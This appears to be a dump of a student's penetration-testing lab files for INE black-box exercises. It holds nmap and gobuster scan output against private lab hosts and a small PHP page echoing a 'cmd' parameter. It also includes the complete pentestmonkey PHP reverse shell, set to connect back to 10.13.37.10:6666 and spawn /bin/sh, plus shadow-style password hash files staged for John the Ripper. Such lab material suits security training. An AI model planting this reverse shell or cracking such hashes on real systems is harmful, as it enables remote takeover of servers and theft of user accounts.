Nmap scan report for 172.16.64.92
Host is up (0.056s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f4:86:09:b3:d6:d1:ba:d0:28:65:33:b7:82:f7:a6:34 (RSA)
| 256 3b:d7:39:c3:4f:c4:71:a2:16:91:d1:8f:ac:04:a8:16 (ECDSA)
|_ 256 4f:43:ac:70:09:a6:36:c6:f5:b2:28:b8:b5:53:07:4c (ED25519)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photon by HTML5 UP
63306/tcp open mysql MySQL 5.7.25-0ubuntu0.16.04.2
| mysql-info:
| Protocol: 10
| Version: 5.7.25-0ubuntu0.16.04.2
| Thread ID: 7
| Capabilities flags: 63487
| Some Capabilities: ODBCClient, Support41Auth, SupportsLoadDataLocal, FoundRows, ConnectWithDatabase, LongPassword, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, Speaks41ProtocolOld, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, Speaks41ProtocolNew, LongColumnFlag, SupportsTransactions, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: g\x04\x1A6\x0FqO\x0D\x18uo[d:I"z/\x10\x11
|_ Auth Plugin Name: mysql_native_password
MAC Address: 00:50:56:A0:0B:82 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=38636%PV=Y%DS=1%DC=D%G=Y%M=005056%T
OS:M=6036E544%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=Z%CI=I%II=I
OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O
OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Uptime guess: 0.007 days (since Wed Feb 24 18:36:09 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 55.71 ms 172.16.64.92
Nmap scan report for 172.16.64.166
Host is up (0.056s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a6:1e:f8:c6:eb:32:0a:f6:29:c8:de:86:b7:4c:a0:d7 (RSA)
| 256 b9:94:56:c7:4d:63:ad:bd:2d:5e:26:43:75:78:07:6f (ECDSA)
|_ 256 d6:82:45:0a:51:4e:01:2d:6a:be:fa:cf:75:de:46:a0 (ED25519)
8080/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Ucorpora Demo
MAC Address: 00:50:56:A0:B1:E8 (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/24%OT=2222%CT=1%CU=35822%PV=Y%DS=1%DC=D%G=Y%M=005056
OS:%TM=6036E544%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=I%II
OS:=I%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7
OS:%O5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%
OS:W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=40%CD=S)
Uptime guess: 0.004 days (since Wed Feb 24 18:40:21 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 56.01 ms 172.16.64.166
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 24 18:46:12 2021 -- 4 IP addresses (4 hosts up) scanned in 122.68 seconds
================================================
FILE: ine-labs/black-box3/alive_hosts.txt
================================================
172.16.37.1
172.16.37.220
172.16.37.234
================================================
FILE: ine-labs/black-box3/dot220/gobuster_scan.txt
================================================
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://172.16.37.220/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.php (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)
=====================================================
=====================================================
================================================
FILE: ine-labs/black-box3/dot234/for_john.txt
================================================
elsuser:$6$MGsPjrt7$hBUzryEWeYdgKvj4MO0v7y0JJ6TxH1oXw4vHCXzG5kZOv8i4ejvbXUM3jkBuymRet9jfQ53hU806p8ujcuuQr1:17515:0:99999:7:::
test:$6$kDmCF0O1$i7.RLl8NmxNCgB2jCGHgmGYV0TcVoaAeTuseohJ5Z71okk/J1N4owqfpuHjmfqAHSxx2MAPezfc8OHy.SRodM1:17983:0:99999:7:::
================================================
FILE: ine-labs/black-box3/dot234/gobuster_scan.txt
================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/server-status (Status: 403)
/xyz (Status: 301)
================================================
FILE: ine-labs/black-box3/dot234/index.php
================================================
<?php
echo "<!-- cmd: " . $_GET["cmd"] . "-->";
echo "<hr />";
system("ifconfig");
?>
================================================
FILE: ine-labs/black-box3/dot234/revshell.php
================================================
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.13.37.10'; // CHANGE THIS
$port = 6666; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
================================================
FILE: ine-labs/black-box3/dot234/scan_xyz.txt
================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.php (Status: 200)
================================================
FILE: ine-labs/black-box3/thorough_nmap_scan.txt
================================================
# Nmap 7.91 scan initiated Thu Feb 25 20:05:44 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN thorough_nmap_scan.txt
Nmap scan report for 172.16.37.220
Host is up (0.057s latency).
Not shown: 59238 closed ports, 6295 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
3307/tcp open tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/25%OT=80%CT=1%CU=44103%PV=Y%DS=2%DC=T%G=Y%TM=603849E
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=2%ISR=109%TI=Z%II=I%TS=8)OPS(O1=M
OS:4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW7%
OS:O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%
OS:DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%
OS:RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.002 days (since Thu Feb 25 20:05:06 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 61.21 ms 10.13.37.1
2 57.49 ms 172.16.37.220
Nmap scan report for 172.16.37.234
Host is up (0.061s latency).
Not shown: 57710 closed ports, 7823 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
40121/tcp open ftp ProFTPD 1.3.0a
40180/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/25%OT=40121%CT=1%CU=36035%PV=Y%DS=2%DC=T%G=Y%TM=6038
OS:49E2%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10F%TI=Z%II=I%TS=8)OPS(O1
OS:=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW
OS:7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=
OS:Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%R
OS:D=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=
OS:G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.002 days (since Thu Feb 25 20:05:06 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Unix
TRACEROUTE (using port 40121/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 172.16.37.220
2 58.71 ms 172.16.37.234
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 25 20:07:46 2021 -- 3 IP addresses (3 hosts up) scanned in 122.12 seconds
================================================
FILE: ine-labs/bruteforce-and-password-cracking/alive_hosts.txt
================================================
192.168.99.22
192.168.99.100
================================================
FILE: ine-labs/bruteforce-and-password-cracking/for_john.txt
================================================
root:$6$NMfSi/bG$y9j8uMu4glpLudMRvzznUZ5h30jlobtAJGZYRaa64pdKy3i1WLTnmPPWUxfPdZwJKReFPU/zBo8HRpD.RAkrG1:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:$6$jLhDRY5M$MJPM2mmM1khh8l0taxORP7oNn4jmwHAOLWZij5DacV25Hzj1ryykobxGlprlgaCXg/PGV2Po34JF4HgPv8roQ.:8:8:mail:/var/mail:/bin/sh
news:$6$7pnXYnUf$F7t6t4A6rQf2z/ycnPuEdzMH9RGB5W0OFL420eKvp/s/SK3KaD6EM/gDNzhL9YFCthi7JVavBa8/nJCxX3XZW0:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:$6$KRss6ftU$c/nB9QsK0iZ0zj8o6VmArcgiuGZ4oOjlLeCDYioV/rrcYYtuE/xkvhdDYvRtlydkFjvlqOXdKDV/0o6fA32Qt.:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:!:100:101::/var/lib/libuuid:/bin/sh
sshd:*:101:65534::/var/run/sshd:/usr/sbin/nologin
mysql:!:102:104:MySQL Server,,,:/nonexistent:/bin/false
telnetd:*:103:106::/nonexistent:/bin/false
sysadmin:$6$Sje/FZov$s6OBgDRso6O25TAo/K62bmuUjGI7po0yaa5y7n4agBKIFywDyleLs2FFNlXJiAgROHN4VD/WkfEFYIXcH9QPW1:1000:1000::/home/sysadmin:/bin/sh
info:$6$b7FyMcC/$Xq.S9rAti5XfKvNR8DK2U0hCusjKeqNBGxrm0W9OvfA29gg68kKRkTyut6rLIf0ib4rLilPg6uiSqCUOuoYFU.:1001:1001::/home/info:/bin/sh
support:$6$5UCqb4PI$080lZhjRESgv4pvv3eYze/PQFkEzIe//QBAgX4383cxPfX4B7hwsPP5d.vEOp49Nep015ISQCkD1SV.b.CeV0.:1002:1002::/home/support:/bin/sh
abuse:$6$wew6XAFC$bRWpMBzLUx9vps5kW8zBJlHh7y7TodfdNfClkmlTEIcs31q9TQR1nPnGYp4GO4fpcOTs/H8Ui62lFoywXMjSs.:1003:1003::/home/abuse:/bin/sh
admin:$6$u145Czfw$8UNRyCdVRM5BpO6wMZBOhJJA4tXLexxwQJhGLbJbD0FUOBWg.V/ybl6BNQVr4er3Gghg8gymvUqu1fMWqLs3V.:1004:1004::/home/admin:/bin/sh
postmaster:$6$TNSdQqc8$Pij0H4TXEH6.i2tpomznu0uY9UFss/wG6xs1qsYQQSJ0YZNB/dBDkmq9I3O1regCsFgS9r7jSGq0GG7eIcqtK1:1005:1005::/home/postmaster:/bin/sh
chris:$6$ZAY5sjcZ$htURsPqIyO4tpNUq12v2GDgAXe4oGVLYPQHDpVn7TMgLm8MP7g5hpZo5NitjHQfqvzB0dptX.fR0ciN6kkWeA/:1006:1006::/home/chris:/bin/sh
webmaster:$6$KLM4wfkU$ZYsO.eQu2qXMfpQaSLzjgJn0dBfyiPRrb4xKT8cUWbaVI.psHzgPuWpkXiwKKWrqfSVCceQBuDVwFNQwH6qWS1:1007:1007::/home/webmaster:/bin/sh
mike:$6$HZRL7RJz$PanyrCDQAvupUzoQ/SjtY1pp4DHQE4p7sVfvh6oZNbAlgUQBIf9R6TMW3wNV4976ngBUhp.39ZKbPwMYf2vsU1:1008:1008::/home/mike:/bin/sh
steve:$6$gDpnLZEp$fd9Cptcb9W2lIYMIP/YTgmT4t2syNr99LWNmdemNdhKOpAQ3KnHMR6/BRtwyKJw2ASYWlM612anHKhT7DEua31:1009:1009::/home/steve:/bin/sh
dave:$6$ye9cmjcs$WwHt5jEfmA3ONfKpD8YjLu2bReTpNoDByFdvfYCHD81609nrgkXEq8iV12LundO8a5oUW9h3HN4m0GYLKHM4W.:1010:1010::/home/dave:/bin/sh
paul:$6$dJKby9gL$YOeP.Ct6VQjxDDptfdvsTjgZEuvoIzhKua8lbn9G/BAQZ5zxNMSaeTAvQYF4Tk3MR6VVmAKrEx86LC2pXmJ4o/:1011:1011::/home/paul:/bin/sh
peter:$6$vMrS1QqI$rY7HpdXf1T2YRXcryJf7ubn98vsPD5aNduivE3biK.ExHmO1bjhn3UlW4wX2B9PPUTiNY49N88jZGKXUr/Yu3.:1012:1012::/home/peter:/bin/sh
matt:$6$WPIf46Nd$/xQQomUKt1rkbWVDMfqJsvPQStDthciv8OwXgPQyTos8Yz3YTlP8WTwWPKyWauiYP6/EiBtAW3LhaBXo3LTXQ.:1013:1013::/home/matt:/bin/sh
jobs:$6$fVNXa4IX$9CCRbwgJpfmQTUCTEBb9tqI0ze1vkSbMUUOusWxnH709pyzTCWdRTBtzViTuECSJBwxZhDwwjZdl7f7rtiAYg.:1014:1014::/home/jobs:/bin/sh
joe:$6$xD.dth1G$g5u/t/SnuBZCprxXo9CogU5AXcaEtWglhu0nzxZzJTimkobFgI97xCR0p66REWXfWDZ.z95SeWoGPswT0j8wU1:1015:1015::/home/joe:/bin/sh
user:$6$nytxqfYV$.ysNgYy5wAqynOjSAt8j7wKqDVwMjhhMI/5NQZohVKtwtZjtoSHSgxhT3MkGUvP5O0INCRZihD34Dz0wB2KCQ/:1016:1016::/home/user:/bin/sh
eric:$6$VuEU0lI9$VCX/Tg6mxXY7wHHoCGQmw8syH39n6wrmUVgChfTd6I0Yt7Un7SFukxR0hhC2NHl6T7Fumr8hVwvML5DMF.Ua./:1017:1017::/home/eric:/bin/sh
dan:$6$zVKkCXse$o07lxPMPnWaHQfbj6s/D23pJNzhLsKi1WGGlsVifSIXdYdQ0pCbl0Rjn/JV83HI4f0lDjBGWLv92gSeBdqCzZ/:1018:1018::/home/dan:/bin/sh
brian:$6$o1kRvK4f$6kx2GgKATEjqgF/Ne5H3EEGBUMz/2zZwVv3kTCr7wnxqN7eKkkBATmz9Ye3C6QW/MQRW.9F6MHSGvJKnA4uFG1:1019:1019::/home/brian:/bin/sh
michael:$6$1yCWFuPq$OiVnd4GHG/8bMLzLyWVpV47WAf7r9LYzTfGLSKI02.Ubq8YK/QsSi7EuXRM7cPC5IH9HpSkYWJQBbOUZQQHYt.:1020:1020::/home/michael:/bin/sh
sales:$6$PsA1.Gfk$zowvm.gcO7raMNmAJ8fDLjKybTUanVmVNld/k5S7gMrwq43Q1jO2MQ/dGhNQTsCNrC2.Vwjt3/D3JKKNHJbX/.:1021:1021::/home/sales:/bin/sh
nanog:$6$FDvdWcSH$F9T5azU4LovIyNB7wX0htrH74TJ46iHmn3QjI8lgQEKVQDeQ6Kd1skimbuTbE7.L7bl9xO7j/GpdiQp2m4c9d.:1022:1022::/home/nanog:/bin/sh
jeff:$6$6hWz2ZU6$xcj.w/GvzUWwqmpE5CVAX8pWrW/92yi/13BKzu31oH80P7KJ2kKr8rpRgMkjuIO3GjHdGg1qmYxkvNcwubsMC/:1023:1023::/home/jeff:/bin/sh
alex:$6$JyMZO.bE$h0b.97PuMtRnim8GRTiWbqxNIvLeiQ12dBTDyufyaClGhIRHnSaNQVdqFMSDY5f.qpGrk0rTxHQ8Ba8zMdk5I.:1024:1024::/home/alex:/bin/sh
scott:$6$LawsHaww$YJJd3lCsV45nty1gHPUp2PIwC9ezfZ8R7s4X4cq16XeiNg34aD.ydJZxG09Gfbv4HhH.BUeCDe.Zg4KDxvccV/:1025:1025::/home/scott:/bin/sh
jason:$6$fvuvc5Jr$Rtbo0pfPs4sgCreQSOKdOy2Xes8ZpGaWpRzau/zT0Fe2PfY895x9FGZUT9OlTJvRH73wuLI1DzkqVq46M8MCo.:1026:1026::/home/jason:/bin/sh
bob:$6$O9g8kRFd$n4qyO7Pn0e0q8.JPhoszE9CT06lheE4PcMaHhB.VXQeWlsAKWoSHaOlI8QDBb0Tx9wKuuyTKsbTE7w6Znw2Uy/:1027:1027::/home/bob:/bin/sh
jim:$6$RoQAB6qb$J6ku0OnN9AW/rlGDogQC0a8mHlM5SEpLJTvpRRYr1ozJ.1tpa14MW/txPzxJM0aDehqIskDrPgeu2GNAQriVx1:1028:1028::/home/jim:/bin/sh
adam:$6$SMfCr27F$ZsSxV5bja0friZIyeaVwKhOta1Kde4X8Lk6HrqCWPA1Nm7TpvsoLZh1qHz/tPJSp6l/LzDIn7lOkGBC4HuD6E.:1029:1029::/home/adam:/bin/sh
james:$6$qEJW3BIW$c8Zo6o0MABzuSLQu5Db6wFZAkNliAVC/VM4NHVu5Sd2mUb.xBIUbuvQLWbbXf6KPgtNhuzPdGrey45LtRYVSP1:1030:1030::/home/james:/bin/sh
tim:$6$JXamlohb$Az7LB/X.bm7J4QU//XHE9W.OGZ87wi2RVRHAWrSYxX75lrZn7vkwSGxBp/pZEZLGUJhnzE86lkIb.VPkst2Ql/:1031:1031::/home/tim:/bin/sh
majordomo:$6$NPJJ2uUo$ct2R6b.jg.WK4dAw2wzdDgxsuHg5LUpdvz9owz.CgAb6L5o/IKsOZj6rbmaWyolhanoOxKrdsmn4.Bysh0hGo/:1032:1032::/home/majordomo:/bin/sh
daniel:$6$8mksQQtb$xXcaS/KPANmdotnWrHa26J4KUaQHBQSxy5FvniWecSyIpvZtZrm9ZMCG/x0WKXzo0NOHwS6yoKYUoRwB4BDwh1:1033:1033::/home/daniel:/bin/sh
ben:$6$2iH7dNAN$zgpUqA9ZXBRRDkJuv1TrAulRGQplR5t98Gx9js77s6quNEtU/hXZLHKryYZtDZO8MJjO.ZUzs8k9QpKrRBGX51:1034:1034::/home/ben:/bin/sh
hostmaster:$6$V5c3cv9Q$S0JMkvGW7qokXYf0lEGAw8kY29s1VKKcSz16N2fvbJHML5BZR6vZofyTGUMNGVJ1k.RNjHYdmOqdId0Ep0wO61:1035:1035::/home/hostmaster:/bin/sh
tom:$6$JWml6IwT$UbW187dhuYbtw983jO9EqT/m6qYzT/Ovvw9lcIpBsL./g7r6SJTDFsupsnNoavyfQ3FE2tq0tr4byVdsvxxu40:1036:1036::/home/tom:/bin/sh
snort:$6$O/joFTvS$zFDDPUYVY3qQq45i6FgZRFx9dQdTTkWoIKE2IsoBw5FrzZGoKiLS82FcMCCr0bouOD0cX/hYswDjKD7UNN4v/1:1037:1037::/home/snort:/bin/sh
andy:$6$vvz6/jIM$KpRwLWVb.JQZd9A/gAgmV/jdyXUr0FzU4CwOpzxVI7/7qd9pt6AFdSSMokJWL.WC7w0yFuITvyoE7iSyy4Ed6/:1038:1038::/home/andy:/bin/sh
andrew:$6$xrxK.ZMk$SbnalSKc8SRQUuZadGTGhClUF18xjC4HTWOPlcT2D5wgRkd.ou5zLE7dyM/bBI0M9vc6WYQjQJ7Teotmc3dJN/:1039:1039::/home/andrew:/bin/sh
greg:$6$M6b5jpj3$1toGupgM1bdko05fLUrnUdDwwdB2nbK3pvpgpA.cK6dI8ZyBW0PnHX29mwK6qV4gGUZaGZGpUHCUZHQPXTW87.:1040:1040::/home/greg:/bin/sh
robert:$6$yfsl9IAe$5ZtjNOyf7uuOo4a.Q7G.96z67KB9BHI.9ri7zeqS6HFk4RjtePvXGdD5iZCK4EJUBsyjy8KYe0NsSEz4S1jZK0:1041:1041::/home/robert:/bin/sh
martin:$6$UMJrcI1d$ljAGjf2Ysu6WZj6OonyBqdWgC1JGBrg/cSkwA8P0AYuFUi2Nj3V8jTz77HSBCgNdBmi8Z0DpU40lkpJoKCVYi1:1042:1042::/home/martin:/bin/sh
rob:$6$KynzgNNI$CRqz5ZCoxyw8Iz3Y4DavYHefo8e3CdPxaJAKmA8G7fVioFb3imRVsOQO9fvR94aOSywrCHx8JRZ8rox4jqVCk.:1043:1043::/home/rob:/bin/sh
stefan:$6$5UNbMPFr$S9zKaPdjN3WF5XdvcBZrc1RV.bk/ufmZgiNAr8OsnKtZCPqFRtQ.g2ewAbQ40ARubCMQD0fIdQSL3LB4JBBuK1:1044:1044::/home/stefan:/bin/sh
